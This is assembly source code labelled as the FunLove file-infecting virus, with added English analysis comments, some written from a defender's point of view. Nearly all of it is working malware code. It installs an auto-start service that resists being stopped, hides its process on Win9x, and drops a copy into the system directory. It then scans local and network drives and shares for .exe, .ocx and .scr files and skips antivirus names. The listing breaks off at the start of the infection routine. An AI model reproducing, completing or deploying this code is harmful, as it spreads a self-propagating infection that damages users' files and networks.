📄 funlove 源代码 .txt
定位API的部分给去掉了
---------------------------------------------------------------[FLCSS.ASM]---
; File prologue: assembler mode, segment setup and the two equates the rest
; of the listing depends on. The directive style (LARGESTACK, RADIX,
; PROC PASCAL, ARG/LOCAL/USES) looks like TASM -- TODO confirm.
.386
LARGESTACK
RADIX 16 ; default radix is hex: bare literals below (104, 4000, 0F01FF) are hexadecimal
ASSUME CS:CODE,DS:CODE
CODE SEGMENT USE32 ; one 32-bit segment serves as both code and data (see ASSUME above)
org 100
main:
; I = 1000h - 300h = 0D00h; it is not referenced in the part of the file shown here.
I equ 1000 - 300
; Text equate used inside address expressions: "[X @]" reads as
; [X + ebx - offset VStart], i.e. every such operand is addressed relative to
; ebx. ebx is presumably loaded by GetVS (not shown) -- verify there.
@ equ + ebx - offset VStart
INCLUDE HEADER.ASM
VStart:
INCLUDE HEADER.ASM
; NOTE(review): HEADER.ASM is included both before and after VStart; its
; contents are not part of this listing.
; ------------------------------------------------------------------------- ;
; ---------------------------- Startup Code --------------------------- ;
; ------------------------------------------------------------------------- ;
; Virus -- startup stub (analysis notes).
; What the visible code does:
;   * calls GetVS (defined elsewhere; presumably sets ebx for the "@" equate);
;   * rewinds the return address on the stack by 8 and copies the 8 bytes
;     saved at HostCode to that address, so the final ret resumes at the
;     restored bytes;
;   * calls RelocKernel32 (not shown) and gives up if it returns 0;
;   * branches on the OS byte: 0 -> Create9xProcess, non-zero -> CreateNTService.
; Out: returns to the rewound address in every path.
Virus PROC NEAR
call GetVS
lea esi,[HostCode @] ; esi -> 8 saved bytes
mov edi,[esp] ; edi = return address of this stub
sub edi,08 ; step back over the 8 bytes that are about to be restored
mov [esp],edi ; ret will now land on the restored bytes
movsd ; copy 8 bytes HostCode -> [edi]
movsd
push dword ptr [esp + 04] ; argument: the dword just above the return address
call RelocKernel32
or eax,eax
jz short Exit ; helper reported failure: do nothing further
cmp byte ptr [OS @],00
jnz short NT_Srv ; non-zero OS flag selects the NT service path
call Create9xProcess
ret
NT_Srv: call CreateNTService
Exit: ret
Virus ENDP
; ------------------------------------------------------------------------- ;
; -------------------- NT Service Creation Routine -------------------- ;
; ------------------------------------------------------------------------- ;
; CreateNTService -- NT persistence path (analysis notes).
; Sequence visible below:
;   RelocAdvapi32 -> OpenSCManagerA -> CreateExecutable -> OpenServiceA,
;   falling back to CreateServiceA when the service does not exist yet,
;   then StartServiceA.
; Any failure along the way (CNT_Failed) starts the infection thread inside
; the current process instead.
; Defender view: the observable artefacts are a service-install event for an
; auto-start service (start type 02) whose binary path is the file written by
; CreateExecutable, and the service being started right afterwards.
CreateNTService PROC PASCAL NEAR
LOCAL SCM_Handle : DWORD
call RelocAdvapi32
or eax,eax
jz short CNT_Failed
push 02 ; desired access 0002h (SC_MANAGER_CREATE_SERVICE)
push 00 ; default database
push 00 ; get the service control manager
call OpenSCManagerA ; handler
or eax,eax
jz short CNT_Failed
mov SCM_Handle,eax
call CreateExecutable
or eax,eax ; if process is running, just exit
jz short CNT_Exit
mov edi,0F01FF ; access mask reused for OpenServiceA and CreateServiceA (SERVICE_ALL_ACCESS)
lea esi,[Service @] ; esi -> service name string (defined outside this listing)
push edi
push esi
push SCM_Handle
call OpenServiceA
or eax,eax
jnz short CNT_Run ; service already registered: just start it
xor eax,eax
push eax ; five trailing CreateServiceA arguments, all zero
push eax
push eax
push eax
push eax
lea eax,[Buffer1 @] ; -> flcss.exe
push eax
push 01 ; ErrorControl
push 02 ; Start
push 20 ; Type
push edi
push 00 ; no display name
push esi
push SCM_Handle
call CreateServiceA
or eax,eax
jz short CNT_Failed
CNT_Run:
; eax = service handle from OpenServiceA or CreateServiceA
push 00
push 00
push eax
call StartServiceA
or eax,eax
jnz short CNT_Exit
CNT_Failed:
call StartInfectionThread ; fallback: run the payload thread in this process
CNT_Exit:
ret
CreateNTService ENDP
; ------------------------------------------------------------------------- ;
; -------------------- W9x Process Creation Routine ------------------- ;
; ------------------------------------------------------------------------- ;
; Create9xProcess -- Win9x path (analysis notes).
; Writes the executable via CreateExecutable, then launches it with
; CreateProcessA using Buffer1 as the command line. Buffer2 is zero-filled
; (40h dwords) and passed for both of the last two CreateProcessA arguments.
; If CreateProcessA fails, the infection thread is started in the current
; process instead. If CreateExecutable returns 0 nothing is launched.
Create9xProcess PROC NEAR
call CreateExecutable
or eax,eax
jz short P9x_Exit
P9x_00:
xor eax,eax
lea edi,[Buffer2 @]
push edi ; last argument (process-information buffer)
push edi ; same buffer again for the startup-info argument
mov ecx,040
repz stosd ; zero 40h dwords at Buffer2; ecx is 0 afterwards
mov cl,06
push eax ; pushed six times in total, see next line
loop $ - 1 ; branches back onto the one-byte "push eax" until ecx reaches 0
lea esi,[Buffer1 @]
push esi ; command line = path built by CreateExecutable
push 00 ; no separate application name
call CreateProcessA
or eax,eax
jnz short P9x_Exit
P9x_Failed:
call StartInfectionThread
P9x_Exit:
ret
Create9xProcess ENDP
; ------------------------------------------------------------------------- ;
; --------------------- flcss.exe Creation Routine -------------------- ;
; ------------------------------------------------------------------------- ;
; CreateExecutable -- drops a standalone copy into the system directory
; (analysis notes).
; Steps visible below:
;   * Buffer1 = GetSystemDirectoryA() + '\' + 12 bytes copied from Process
;     (the file name; the section banner and a later comment call it flcss.exe);
;   * OpenFile (local helper, not shown) is called with that path and
;     disposition 02 ("create always");
;   * two WriteFile calls, both with ebx as the source pointer: 0200h bytes,
;     then Phys_VSize bytes;
;   * the handle is closed.
; Out: eax = 0 when OpenFile returned -1 (the inc at CE_Exit turns -1 into 0);
;      otherwise CloseHandle's result + 1. Callers treat 0 as "do not continue".
; Defender view: a new executable appearing directly under the system
; directory, written by a process that is not an installer, is the artefact
; this routine leaves behind.
CreateExecutable PROC PASCAL NEAR
LOCAL c_FileHandle : DWORD, \
c_BytesWritten : DWORD
USES esi,edi
lea edi,[Buffer1 @]
push edi ; left on the stack: file-name argument for OpenFile below
push 104 ; buffer size 104h (260) bytes
push edi
call GetSystemDirectoryA
add edi,eax ; eax = length written; edi -> end of the directory string
mov al,'\'
stosb
lea esi,[Process @]
movsd ; append 12 bytes from Process
movsd
movsd
push 02 ; create always
call OpenFile
cmp eax,-1
jz short CE_Exit
mov c_FileHandle,eax
lea edi,[VImports + 4 @] ; clean main import table
mov eax,-1
stosd
stosd
lea edi,[Kernel32_Relocated @] ; restore 2nd imp. table
mov eax,[edi - 8] ; (necessary for NT)
stosd
push 00
lea esi,c_BytesWritten
push esi
push 0200 ; 200h bytes
push ebx ; source = ebx, the base used by the "@" equate
push c_FileHandle
call WriteFile ; write header
push 00
push esi
push Phys_VSize
push ebx
push c_FileHandle
call WriteFile ; write vrs
push c_FileHandle
call CloseHandle
CE_Exit:
inc eax ; -1 (open failed) becomes 0; any other value stays non-zero unless it was -1
ret
CreateExecutable ENDP
; ------------------------------------------------------------------------- ;
; --------------------------- Viral Service --------------------------- ;
; ------------------------------------------------------------------------- ;
; VService -- startup routine of the standalone copy (analysis notes;
; presumably the entry point of the dropped executable -- confirm against the
; header that is not shown).
; NT branch: builds a two-entry service table at Buffer1
;   { Service, ServiceDispatcher }, { 0, 0 } and hands it to
;   StartServiceCtrlDispatcherA.
; Win9x branch: registers a window class named after Service, then calls
;   RegisterServiceProcess(pid, 1) so the process no longer appears in the
;   task list (per the original comment), waits, and starts the infection
;   thread.
; Both USER32!RegisterClassA and KERNEL32!RegisterServiceProcess are resolved
; at run time with GetProcAddress and patched into local call stubs.
VService PROC NEAR
call GetVS
push dword ptr [esp] ; argument: copy of this routine's return address
call RelocKernel32
or eax,eax
jz VS_Exit
cmp byte ptr [OS @],00
jz short W9x_Service_Register
WNT_Service_Hacknowledge:
call RelocAdvapi32
or eax,eax
jz VS_Exit
lea esi,[Buffer1 @]
xor eax,eax
lea ecx,[Service @]
lea edx,[ServiceDispatcher @]
mov [esi],ecx ; entry 0: service name
mov [esi + 04],edx ; entry 0: service main routine
mov [esi + 08],eax ; entry 1: zero terminator
mov [esi + 0C],eax ; give control back to caller
; and jump to dispatcher
push esi
call StartServiceCtrlDispatcherA
; No ret/jmp follows the call above: when it returns, execution continues
; into the Win9x registration code below.
W9x_Service_Register:
lea esi,[USER32_Name @]
push esi
call LoadLibraryA
lea esi,[RegisterClassA + 7 @] ; presumably the name string stored inside the stub -- layout not shown
push esi
push eax
call GetProcAddress
or eax,eax
jz short VS_00
mov [esi - 06],eax ; store the resolved address into the stub (stub + 1)
lea esi,[Buffer1 @]
mov edi,esi
xor eax,eax
mov ecx,0A
repz stosd ; zero 0Ah dwords (28h bytes) for the class structure
mov dword ptr [esi + 04],-1 ; ? (must be <> 0)
mov dword ptr [esi + 10],400000 ; image base
lea eax,[Service @]
mov [esi + 24],eax ; class name = Service string
push esi
call RegisterClassA ; necessary, or RSP won't work
lea esi,[RegisterServiceProcess + 7 @]
push esi
push dword ptr [Kernel32_Base @]
call GetProcAddress
or eax,eax
jz short VS_00
mov [esi - 06],eax
call GetCurrentProcessId
; register our process in order
push 01 ; to vanish from the task list
push eax
call RegisterServiceProcess
push 8*1000d ; wait 8 seconds
call Sleep
VS_00:
call StartInfectionThread
VS_Exit:
ret
VService ENDP
; ------------------------------------------------------------------------- ;
; ----------------------- NT Service Dispatcher ----------------------- ;
; ------------------------------------------------------------------------- ;
; ServiceDispatcher -- service main routine named in the table built by
; VService (analysis notes).
; Registers ServiceHandler as the control handler for Service, fills a status
; block at Buffer1 (first three dwords = 10h, 04, 07; the next three zeroed)
; and reports it with SetServiceStatus, then sleeps and starts the infection
; thread. In the SERVICE_STATUS layout those three values are service type
; 10h, current state 04 (running) and accepted controls 07.
ServiceDispatcher PROC PASCAL NEAR
LOCAL Service_Handle : DWORD
call GetVS
lea esi,[ServiceHandler @]
lea edi,[Service @]
push esi
push edi
call RegisterServiceCtrlHandlerA
mov Service_Handle,eax
lea esi,[Buffer1 @]
mov edi,esi
mov ecx,06
xor eax,eax
repz stosd ; zero 6 dwords at Buffer1
mov dword ptr [esi],10
mov dword ptr [esi + 04],04
mov dword ptr [esi + 08],07
push esi
push Service_Handle ; now tell windows our service
call SetServiceStatus ; correctly started
push 8*1000d ; same delay expression as in VService, where it is commented "wait 8 seconds"
call Sleep
call StartInfectionThread
ret
ServiceDispatcher ENDP
; ------------------------------------------------------------------------- ;
; -------------------------- Service Handler -------------------------- ;
; ------------------------------------------------------------------------- ;
; ServiceHandler -- control handler registered by ServiceDispatcher.
; The body is a bare ret: no control request is inspected or acknowledged.
; Defender view: per the original comment, an attempt to stop the service
; through the service manager ends in an error, so stopping it that way
; should not be relied on during cleanup.
ServiceHandler PROC NEAR
ret ; if the admin tries to halt the
; service, he'll get a system error
ServiceHandler ENDP
; ------------------------------------------------------------------------- ;
; ------------------- Thread Creation Routine ------------------ ;
; ------------------------------------------------------------------------- ;
; StartInfectionThread -- stores GetTickCount() in Rand and creates a thread
; whose start routine is VThread. All other CreateThread arguments are zero
; except the pointer to the local ThreadId. The thread handle returned in eax
; is not stored or closed here.
StartInfectionThread PROC PASCAL NEAR
LOCAL ThreadId : DWORD
call GetTickCount
mov [Rand @],eax ; tick count kept in Rand (presumably the seed used by GetRand -- not shown)
lea eax,ThreadId
push eax ; receives the thread id
push 0 ; creation flags
push 0 ; thread parameter
lea eax,[VThread @]
push eax ; start routine
push 0 ; default stack size
push 0 ; default security attributes
call CreateThread
ret
StartInfectionThread ENDP
; ------------------------------------------------------------------------- ;
; ---------------------------- Viral Thread --------------------------- ;
; ------------------------------------------------------------------------- ;
; VThread -- thread body started by StartInfectionThread; it never returns.
; Each pass: InfectDrives, Sleep, then GetRand. InfectNetwork runs only when
; the low five bits of the value in al are all zero; otherwise the loop
; restarts immediately. The Sleep argument is the expression 60d * 1000d
; (under RADIX 16 -- check how the assembler reads the d suffix).
; Defender view: drive scanning is periodic and network enumeration is
; intermittent, so a short observation window can miss the network activity.
VThread PROC NEAR
call GetVS
call InfectDrives
push 60d * 1000d
call Sleep
call GetRand
and al,1F ; keep the low five bits
jnz short VThread ; non-zero: skip the network pass this round
call InfectNetwork
jmp short VThread
VThread ENDP
; ------------------------------------------------------------------------- ;
; --------------------- Network Infection Routine --------------------- ;
; ------------------------------------------------------------------------- ;
; InfectNetwork -- loads the library named by MPR_Name, passes its handle and
; the MPR_Functions table to DLL_Relocate (not shown), and on success starts
; the recursive enumeration with NetSearch(0). Either failure returns without
; doing anything. The library handle is not released here.
InfectNetwork PROC NEAR
lea eax,[MPR_Name @]
push eax
call LoadLibraryA
or eax,eax
jz short INet_Failed
push eax ; module handle
lea esi,[MPR_Functions @]
push esi ; table handed to DLL_Relocate
call DLL_Relocate
or eax,eax
jz short INet_Failed
push 00 ; argument 0: no starting resource, enumerate from the top
call NetSearch
INet_Failed:
ret
InfectNetwork ENDP
; ------------------------------------------------------------------------- ;
; ---------------------- Valid Drive Test Routine --------------------- ;
; ------------------------------------------------------------------------- ;
; InfectDrives -- walks drive roots and runs the file search on each usable one.
; Buffer1 is initialised with the bytes '@', ':', '\', ' ' and the fourth byte
; is replaced by NUL before every GetDriveTypeA call, so the roots tested are
; "@:\" through "Z:\" (the first byte is incremented after each test).
; Only drive types 03 (fixed) and 04 (network) are processed; for those,
; BlownAway (not shown) and FileSearch are called with a pointer to the end
; of the root string. Tick receives GetTickCount() at the start.
; Defender view: mapped network drives are treated exactly like local fixed
; disks here, so write access on shares matters as much as on local volumes.
InfectDrives PROC NEAR
push esi
call GetTickCount
mov [Tick @],eax
lea esi,[Buffer1 @]
mov dword ptr [esi],' \:@'
ID_TestDrive:
mov byte ptr [esi + 03],00 ; terminate the root string after "X:\"
push esi
call GetDriveTypeA
cmp al,03 ; fixed disk
jz short ID_DriveOk
cmp al,04 ; network drive
jnz short ID_Invalid
ID_DriveOk:
add esi,03 ; esi -> position right after "X:\"
push esi
call BlownAway
push esi
call FileSearch
sub esi,03 ; back to the start of Buffer1
ID_Invalid:
mov al,[Buffer1 @]
inc al ; next drive letter
mov [Buffer1 @],al
cmp al,'Z'
jna short ID_TestDrive ; continue while the letter is <= 'Z'
pop esi
ret
InfectDrives ENDP
; ------------------------------------------------------------------------- ;
; ----------------- Recursive Computer Search Routine ----------------- ;
; ------------------------------------------------------------------------- ;
; NetSearch -- recursive enumeration of network resources (analysis notes).
; NOTE(review): in the ARG/LOCAL lines below the name and its type appear
; fused by text extraction; the body refers to the names WNetStructAddr,
; EnumBufferAddr, EnumBufferSize and EnumNB_Objects.
; Flow visible below:
;   * WNetOpenEnumA with scope 2, type 0, usage 0 and the incoming resource
;     pointer; the enumeration handle is written back over the argument slot;
;   * a 4000h-byte buffer is obtained with VirtualAlloc;
;   * WNetEnumResourceA fills the buffer; each 20h-byte entry is examined:
;       - the name at entry+14h, unless null or starting with the word 0041h,
;         is copied to Buffer1, a '\' is appended, and BlownAway / FileSearch
;         are called on it;
;       - if bit 1 of the dword at entry+0Ch is set, NetSearch recurses on
;         the entry;
;   * the loop ends when WNetEnumResourceA returns non-zero; the buffer is
;     freed and the enumeration closed.
; Defender view: every share name the current user can enumerate is handed to
; the same file search used for local drives.
NetSearch PROC PASCAL NEAR
ARG WNetStructAddrWORD ; pointer to the network struct (20h)
LOCAL EnumBufferAddrWORD, \ ; network buffer address
EnumBufferSizeWORD, \ ; network buffer size (4000h)
EnumNB_ObjectsWORD ; number of network structs enumerated
USES esi, edi
mov EnumBufferSize,4000
or EnumNB_Objects,-1 ; -1: ask for as many entries as fit
lea eax,WNetStructAddr
push eax ; handle is returned into the argument slot
push WNetStructAddr ; resource to enumerate (0 on the first call)
push 0
push 0
push 2
call WNetOpenEnumA
or eax,eax
jnz NET_Close
push 04 ; protection 04 (read/write)
push 1000 ; allocation type 1000h (commit)
push 4000 ; size
push 00 ; let the system choose the address
call VirtualAlloc
or eax,eax
jz short NET_Close
mov EnumBufferAddr,eax
NET_00:
mov esi,EnumBufferAddr
lea eax,EnumBufferSize
push eax
push esi
lea eax,EnumNB_Objects
push eax
push WNetStructAddr ; now holds the enumeration handle
call WNetEnumResourceA
or eax,eax
jnz short NET_Free ; any non-zero result ends the enumeration
mov ecx,EnumNB_Objects
or ecx,ecx
jz short NET_00 ; nothing returned: ask again
NET_01:
push ecx ; entry counter
push esi ; current entry
mov esi,[esi + 14] ; computer resource name
or esi,esi ; (\\XXX\C, for example)
jz short NET_03
cmp word ptr [esi],0041 ; floppy ?
jz short NET_03
lea edi,[Buffer1 @]
NET_02:
movsb ; copy the name up to, not including, its NUL
cmp byte ptr [esi],00
jnz short NET_02
mov al,'\'
stosb
push edi
call BlownAway
push edi
call FileSearch
NET_03:
pop esi ; back to the current entry
mov eax,[esi + 0C]
and al,2
cmp al,2
jnz short NET_04 ; bit 1 clear: not recursed into
push esi
call NetSearch
NET_04:
add esi,20 ; next 20h-byte entry
pop ecx
loop NET_01
jmp short NET_00
NET_Free:
push 8000 ; free type 8000h (release)
push 00
push EnumBufferAddr
call VirtualFree
NET_Close:
push WNetStructAddr
call WNetCloseEnum
ret
NetSearch ENDP
; ------------------------------------------------------------------------- ;
; ------------------- Recursive File Search Routine ------------------- ;
; ------------------------------------------------------------------------- ;
; FileSearch -- recursive directory walk and target selection (analysis notes).
; In:  CurrentDirEnd = pointer into Buffer1, just past the current directory
;      path (callers pass the position after the trailing '\').
; Flow visible below:
;   * "*.*" is written at CurrentDirEnd and FindFirstFileA / FindNextFileA
;     iterate the directory into Buffer2;
;   * directories (attribute bit 10h) whose name does not start with '.' are
;     appended to the path and searched recursively;
;   * files go through FileTest (placed after the routine's ret and reached
;     only by the jump from RS_01), which rejects a file when
;       - the first four name characters, lower-cased and XORed with
;         61F81F61h, match one of the 0Ch entries in SkipNames,
;       - the last three characters are not "ocx", "scr" or "exe",
;       - the size dword at offset 20h is below 2000h, or
;       - the low byte of that size is 03 (the original comment calls this
;         the self-infection test);
;   * for an accepted file the full path is assembled in Buffer3 and
;     InfectFile is called with it.
; Defender view: the selection criteria above (three extensions, minimum
; size, name skip list, size-based marker) describe which files on a
; reachable volume are at risk and which are left alone.
FileSearch PROC PASCAL NEAR
ARG CurrentDirEnd : DWORD
LOCAL SearchHandle : DWORD
USES esi,edi
mov eax,CurrentDirEnd
mov dword ptr [eax],002A2E2A ; *.*
lea edi,[Buffer2 @]
lea esi,[Buffer1 @]
push edi ; find-data buffer
push esi ; search pattern = Buffer1 path + "*.*"
call FindFirstFileA
cmp eax,-1
jz short RS_Exit
RS_00:
mov SearchHandle,eax
RS_01:
test byte ptr [edi],10 ; dir ?
jz short FileTest
RS_Directory:
cmp byte ptr [edi + 2C],'.' ; skips every name that begins with a dot
jz short RS_Next
mov esi,edi
add esi,2C ; esi -> entry name in the find data
mov edi,CurrentDirEnd
RSD_00:
movsb ; append the directory name to the path
cmp byte ptr [esi],0
jnz short RSD_00
mov al,'\'
stosb
push edi ; new end-of-path pointer
call FileSearch
RS_Next:
lea edi,[Buffer2 @]
push edi
push SearchHandle
call FindNextFileA
or eax,eax
jnz short RS_01
push SearchHandle
call FindClose
RS_Exit:
ret
FileTest:
mov edx,[edi + 2C] ; first four characters of the file name
or edx,20202020 ; force lower case
xor edx,61F81F61 ; table entries are stored XORed with this constant
lea esi,[SkipNames @] ; check av names
mov ecx,0C
FT_00:
lodsd
cmp edx,eax
jz short FT_Exit
loop FT_00
mov esi,edi
add esi,2C
FT_01:
lodsb ; scan to the end of the name
or al,al
jnz short FT_01
mov eax,[esi - 4] ; check extent
or eax,20202020 ; lower-case; the terminating NUL becomes a space
cmp eax,' xco'
jz short FT_02
cmp eax,' rcs'
jz short FT_02
cmp eax,' exe'
jnz short FT_Exit
FT_02:
mov eax,[edi + 20] ; minimum file size
cmp eax,2000
jc short FT_Exit ; smaller than 2000h bytes: skip
cmp al,03 ; self-infection test
jz short FT_Exit
lea esi,[Buffer1 @] ; get complete file name
lea edi,[Buffer3 @] ; with path
push edi ; argument for InfectFile below
mov ecx,CurrentDirEnd
sub ecx,esi ; length of the directory part
repz movsb
lea esi,[Buffer2 @]
add esi,2C
FT_03:
movsb ; copy the file name including its NUL
cmp byte ptr [esi - 1],0
jnz short FT_03
call InfectFile
FT_Exit:
jmp RS_Next ; rejoin the directory iteration
FileSearch ENDP
; ------------------------------------------------------------------------- ;
; ----------------------- File Infection Routine ---------------------- ;
; ------------------------------------------------------------------------- ;
InfectFile PROC PASCAL NEAR
ARG i_Filename : DWORD
LOCAL i_FileHandle : DWORD, \
i_FileSize : DWORD, \
i_BytesRead : DWORD, \
i_VirusOffset : DWORD, \
i_MapHandle : DWORD, \
i_HostDep32 : DWORD, \
i_EP_Offset : DWORD
USES esi,edi
push i_Filename
push 03 ; open existing
call OpenFile
cmp eax,-1